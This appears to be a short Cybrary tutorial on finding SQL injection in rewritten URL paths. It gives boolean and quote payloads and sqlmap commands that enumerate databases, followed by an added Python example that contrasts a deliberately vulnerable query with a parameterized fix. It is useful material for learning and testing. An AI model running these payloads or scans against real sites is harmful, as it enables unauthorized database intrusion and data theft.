How to Test and Exploit SQL Injections in URL Rewrite Rules - Cybrary

First of all, what is URL rewrite?

You've likely seen sites with this schema in URLs: https://victim.com/?id=1

Almost everyone knows how to test for SQL injection in this situation:

http://mysite.com/?id=1'
http://mysite.com/?id=1 and 2.5=2.5
http://mysite.com/?id=1 and 3.4=3.5

and so on.

But with URL rewrites, the URL http://victim.com/?id=1 becomes http://victim.com/1 (the id parameter name is hidden and its value, 1, is used directly in the URL).

To test for SQL injection in these kinds of URLs, we use the same payloads as before, but placed after the parameter value:

http://victim.com/1'
http://victim.com/1 and 3.6=3.6
http://victim.com/1 and 3.6=3.77

and so on.

The results would be the same as for a normal post parameter.

To test for SQL injection with sqlmap, we just put a star in the URL. For instance:

sqlmap -u "http://victim.com/1*" --random-agent --level 5 --risk 3 --dbs

or

sqlmap -u "http://victim.com/content*/1" --random-agent --level 5 --risk 3 --dbs

The second command injects into the content parameter. The star sign shows sqlmap where to inject payloads.

Happy Hacking
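Why the rewritten URL behaves the same way, and how to close the hole, shown as an added example (not code from the original post). The rewrite rule, the posts table and the function names are assumptions made for illustration; the path is taken as already URL-decoded.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data standing in for the site's content table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO posts VALUES (?, ?)",
                   [(1, "first"), (2, "second")])
    return db

def rewrite(path):
    """Mimic a hypothetical rewrite rule ^/(.+)$ -> /?id=$1."""
    m = re.match(r"^/(.+)$", path)
    return m.group(1) if m else None

def lookup_vulnerable(db, path):
    # The path segment is pasted into the SQL text, exactly as ?id= would be,
    # so hiding the parameter name changes nothing for the query.
    ident = rewrite(path)
    if ident is None:
        return []
    return db.execute("SELECT title FROM posts WHERE id = " + ident).fetchall()

def lookup_hardened(db, path):
    # Accept only a short run of digits, then bind the value as a parameter.
    ident = rewrite(path)
    if ident is None or not re.fullmatch(r"[0-9]{1,9}", ident):
        return None  # the caller should answer 404
    return db.execute("SELECT title FROM posts WHERE id = ?",
                      (int(ident),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    # The three test strings are the ones used in the post.
    for path in ["/1", "/1 and 3.6=3.6", "/1 and 3.6=3.77", "/1'"]:
        try:
            weak = lookup_vulnerable(db, path)
        except sqlite3.Error as exc:
            weak = "SQL error: %s" % exc
        print(repr(path), "| vulnerable:", weak,
              "| hardened:", lookup_hardened(db, path))
```

In the vulnerable handler the true and false conditions return different results and the quote raises a database error, which is the signal the tests above look for; the hardened handler answers all three identically.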
